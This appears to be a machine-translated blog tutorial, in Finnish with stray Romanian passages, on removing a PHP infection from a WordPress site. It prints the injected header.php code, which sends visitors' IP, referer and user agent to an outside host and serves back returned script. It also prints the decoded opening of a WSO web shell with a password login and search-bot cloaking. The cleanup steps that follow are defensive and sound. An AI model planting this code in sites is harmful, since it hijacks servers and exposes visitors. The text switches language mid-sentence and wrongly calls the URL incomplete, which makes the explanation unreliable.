kirjoittaja
Poista WordPress PHP Virus
Poista WordPress PHP Virus
Tämä opetusohjelma esittelee erityisen tapauksen, jossa WordPress-blogi sai tartunnan. Poista WordPress PHP Virus.
sisältö
Toissapäivänä huomasin epäilyttävän koodin, joka näyttää olevan PHP-virus WordPressille. Seuraava PHP-koodi oli mukana header.php, ennen riviä </head>.
<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>Tämä on PHP-koodi, joka näyttää siltä, että se yrittäisi hakea resurssin sisältöä ulkoiselta palvelimelta, mutta URL-osoitteeseen viittaava osa on epätäydellinen.
Mecanismul de funcționare este ceva mai complex și face acest WordPress PHP Virus invizibil pentru vizitatorii site-urilor afectate. În schimb, acesta vizează motoarele de căutare (Google) și duce implicit la scăderea semnificativă a numărului de vizitatori pe website-urile afectate.
WordPress PHP Virus -haittaohjelmatiedot
1. Codul de mai sus este prezent în header.php.
2. Pe server a apărut un fișier wp-log.php în folderul wp-includes.
3. wp-log.php conține un cod criptat, dar care este relativ ușor de decriptat.
<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>Decriptare cod malware din wp-log.php -
<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("
<pre align=center-->
<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>Acesta pare a fi un script PHP malware care conține cod pentru a gestiona autentificarea și acțiuni asupra fișierelor și directoarelor pe un server. Se poate observa foarte ușor că acest script conține variabile precum $auth_pass (parola de autentificare), $default_action (oletustoiminto), $default_use_ajax (oletusarvoisesti Ajaxilla) ja $default_charset (oletusmerkkiasetus).
Ilmeisesti tässä komentosarjassa on osio, joka tarkistaa HTTP-käyttäjäagentit estääkseen pääsyn tiettyihin verkkobotteihin, kuten hakukoneisiin. Siinä on myös osio, joka tarkistaa PHP-suojaustilan ja asettaa tietyt työhakemistot.
4. Jos wp-log.php avataan selaimessa, näkyviin tulee web-sivu, jossa on kenttä todennus. Ensi silmäyksellä se näyttää olevan tiedostonhallinta, jonka kautta uusia tiedostoja voidaan helposti ladata kohdepalvelimelle.
Oletko poistanut viruksen WordPress-sivustosta?
Manuaalisessa viruksenpoistoprosessissa on aina ensin löydettävä ja ymmärrettävä, mikä haavoittuvuus oli.
1. Luo varmuuskopio koko verkkosivustolle. Tämän tulee sisältää sekä tiedostot että tietokanta.
2. Määritä likimääräisesti, kuinka kauan virus on ollut olemassa, ja etsi web-palvelimelta muokattuja tai äskettäin luotuja tiedostoja likimääräisen ajanjakson sisällä.
Jos esimerkiksi haluat nähdä tiedostot .php luotu tai muokattu viime viikolla, suorita komento palvelimessa:
find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"Se on yksinkertainen menetelmä, jolla voit paljastaa tartunnan saaneet WordPress-tiedostot ja haittaohjelmakoodia sisältävät tiedostot.
3. Tarkista tiedosto .htaccess epäilyttävistä ohjeista. Käyttöoikeudet tai komentosarjan suoritusrivit.
4. Tarkista tietokanta. On hyvin mahdollista, että joitain WordPress-julkaisuja ja -sivuja on muokattu haittaohjelmilla tai uusia on lisätty käyttäjät, joilla on järjestelmänvalvojan rooli.
5. Tarkista kansioiden ja tiedostojen kirjoitusoikeudet. chmod ja chown.
Suositellut käyttöoikeudet ovat: 644 tiedostoille ja 755 hakemistoille.
find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;6. Päivitä kaikki WordPress Plugins / WordPress Themes.
Liittyvät: Korjaa uudelleenohjaus WordPress Hack 2023 (viruksen uudelleenohjaus)
Nämä ovat menetelmiä “perus” jonka avulla voit poistaa viruksen WordPress-sivustolta/blogista. Jos sinulla on ongelmia ja tarvitset apua, kommenttiosio on auki.
Poista WordPress PHP Virus
Saatat olla kiinnostunut myös...
